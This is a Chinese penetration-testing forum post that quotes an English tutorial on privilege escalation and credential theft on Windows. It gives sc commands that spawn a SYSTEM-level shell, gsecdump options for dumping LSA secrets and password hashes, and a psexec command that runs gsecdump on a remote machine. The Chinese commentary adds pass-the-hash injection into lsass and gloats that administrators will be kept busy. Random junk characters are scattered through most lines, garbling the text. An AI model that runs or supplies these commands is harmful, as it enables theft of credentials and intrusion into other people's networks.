找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
返回列表 发新帖
查看: 2566|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:. M3 ]6 G: r  f1 E& \5 U8 ]; }

! d& X4 E" F  T1 F5 z- B1 L- lC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
# d% C" d* ~, a" A3 w# Q; N[SC] CreateService SUCCESS1 X: y6 m5 {* U$ {+ E5 t- B

5 n6 M  f4 r, x( XC:\>sc start shellcmdline
  A" X) }$ z; G- g5 _# B8 l4 P[SC] StartService FAILED 1053:
% J: w, a1 v: y: |$ W- L% V& ]
0 S- t9 _4 B0 s; x; iThe service did not respond to the start or control request in a timely fashion.- O: S! x) Z$ M. I9 U
0 R# j; O2 c* v, U$ Z
C:\>sc delete shellcmdline) n( X* R9 w2 K' J/ h# J
[SC] DeleteService SUCCESS, r+ x9 f% \0 B. V
: R3 q0 }; s/ f+ b+ W: |1 H
------------7 A( `# D. _. G2 u, `
, a0 F0 C2 f- t
Then in the new DOS window:( |1 A0 ]! n! @; \' p! Q. U  }
. g2 G% @  X: h0 @3 b- p# |
Microsoft Windows XP [Version 5.1.2600]  o  I* U: S+ q" \' L. m; k$ `: H& j* o
(C) Copyright 1985-2001 Microsoft Corp.5 F' W# g7 O! O* W# i
8 c- O5 y" G- m7 w! i* B
C:\WINDOWS\system32>whoami' g5 H9 T2 o1 n( |0 t9 x2 q
NT AUTHORITY\SYSTEM
, i$ n/ F4 y/ R0 A. i+ ^
- o8 n/ G3 L8 T6 G$ w1 d. {$ @C:\WINDOWS\system32>gsecdump -h
& G+ y+ N) V6 sgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
9 y3 b2 M% U" W9 d4 o8 C" N# }usage: gsecdump [options]  }# q) ?1 k; y- F
* g, a1 O9 m3 d
options:5 }$ y7 H+ c+ p" u7 d
-h [ --help ] show help8 x$ r. w6 P+ c# e& v8 U9 W: }5 T2 ~, J
-a [ --dump_all ] dump all secrets( g6 J3 p! n0 M3 s* K
-l [ --dump_lsa ] dump lsa secrets  M7 C7 {  C) I
-w [ --dump_wireless ] dump microsoft wireless connections
. @9 k! L, I# Q, v- U. I7 Y-u [ --dump_usedhashes ] dump hashes from active logon sessions
: e* v# }, c4 Y7 t3 S/ k-s [ --dump_hashes ] dump hashes from SAM/AD) f0 o2 J+ G3 V) `; H5 D+ |
8 l2 }( r3 m) J% N/ `$ v
Although I like to use:* t& m3 n  ^8 ?! m" I

- x6 P6 g3 B  k& `1 f! p" _PsExec v1.83 - Execute processes remotely
% I5 w0 T/ c# N- [" x3 ^Copyright (C) 2001-2007 Mark Russinovich+ H6 v& J$ A- h6 {
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
4 C! T8 t/ \. T( U# V3 F3 h: M+ M: g5 W9 o! d( ]5 C
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT* a7 P/ |6 c1 v# B$ l! z

. ^6 ]3 M) t- Y) F7 Z2 U( y& ato get the hashes from active logon sessions of a remote system./ v: p* `) R' ]8 F/ h: W3 l) @( ~
7 W: B# X4 ~& l. v: }( a6 N
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.) e% s1 O( l& j  t8 v. K  A

: g) w0 K. @6 w( m# J4 u# |提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
# X  y) O  f9 u5 m$ M6 K* H3 N原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]& B% f# J1 x+ g7 d0 S/ N- ?

% \3 P5 S. [! o; x6 d我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
/ v; i) H* [1 ~
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表